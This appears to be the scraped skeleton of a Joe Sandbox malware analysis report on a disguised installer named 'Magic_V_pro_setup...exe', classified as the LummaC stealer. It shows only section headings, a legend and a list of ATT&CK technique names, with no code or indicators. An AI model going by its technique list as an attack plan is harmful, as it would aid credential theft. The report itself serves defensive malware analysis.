IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	11 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Magic_V_pro_setup_stable_latest_release_version_9_709.exe

Overview

General Information

Detection

Compliance

Signatures

Classification

Process Tree

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Privilege Escalation

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Protection of GUI

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
Magic_V_pro_setup_stable_latest_release_version_9_709.exe